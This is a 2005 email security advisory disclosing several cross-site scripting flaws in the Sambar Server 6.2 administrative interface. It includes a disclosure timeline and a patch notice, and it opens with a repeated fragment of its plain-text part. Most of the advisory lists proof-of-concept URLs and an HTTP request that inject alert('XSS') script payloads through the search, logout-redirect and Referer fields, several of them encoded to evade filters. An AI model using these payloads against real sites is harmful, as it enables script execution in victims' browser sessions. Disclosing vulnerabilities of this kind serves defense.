&style=fancy&spage=60&query=Folder%20name No chevron '<' '>' XSS within the /search directory: ==================================================== 1. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name 2. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name 3. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name 4. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name 5. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name 6. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name Escaping from HTML XSS within the /session directory: ==================================================== 1. alert(%27XSS%27)http://192.168.0.5/session/logout?RCredirect=--> Including XSS within referrer: ============================== 1. GET /CheckingXssInReferer.html HTTP/1.0 Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false Host: 192.168.0.5 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Referer: "> SOLUTION: ========= Sambar Server has been contacted and has released patches. Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :) REFERENCE: ========== http://www.sambar.com/security.htm http://homepage.hispeed.ch/spamtrap/sambar62p.exe CREDITS: ======== Tod Sambar for understanding the issue and resolving in a timely manner. This vulnerability was discovered and researched by Jamie Fisher mail: contact_jamie_fisher[at]yahoo.co.uk --------------------------------- Yahoo! Messenger NEW - crystal clear PC to PCcalling worldwide with voicemail --0-1405209961-1116882149=:65898 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit

- Sambar -

AFFECTED PRODUCTS:
==================

Sambar Server 6.2

http://www.sambar.com/

OVERVIEW:
=========

Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.

HISTORY:
========

17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available

DETAILS:
========

Multiple XSS found in the administrative interface.

In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied
input. A user can input a specially crafted script that when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site.

ISSUE:
======

Crafted input of causes the application to output what is known as a Cross Site Script. The script is rendered upon visitation to the affected the page served by the application.

EXAMPLE:
========

Standard XSS within the /search directory:
==========================================

1.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name

2.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name

3.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name

4.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name

5.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name

6.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name

7.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name

8.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name

9.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name

10.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name

11.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name

12.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name

Standard XSS within the /session directory:
===========================================

1.
http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>

2.
http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>

3.
http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>

HTML XSS within the /search directory:
======================================

1.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name

2.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name

3.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name

4.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name

5.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name

6.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name

No chevron '<' '>' XSS within the /search directory:
====================================================

1.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name

2.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name

3.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name

4.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name

5.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name

6.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name

Escaping from HTML XSS within the /session directory:
====================================================

1.
http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>

Including XSS within referrer:
==============================

1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script>

SOLUTION:
=========

Sambar Server has been contacted and has released patches.

Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :)

REFERENCE:
==========

http://www.sambar.com/security.htm

http://homepage.hispeed.ch/spamtrap/sambar62p.exe

CREDITS:
========

Tod Sambar for understanding the issue and resolving in a timely manner.

This vulnerability was discovered and researched by Jamie Fisher

mail: contact_jamie_fisher[at]yahoo.co.uk

Yahoo! Messenger NEW - crystal clear PC to PC calling worldwide with voicemail --0-1405209961-1116882149=:65898--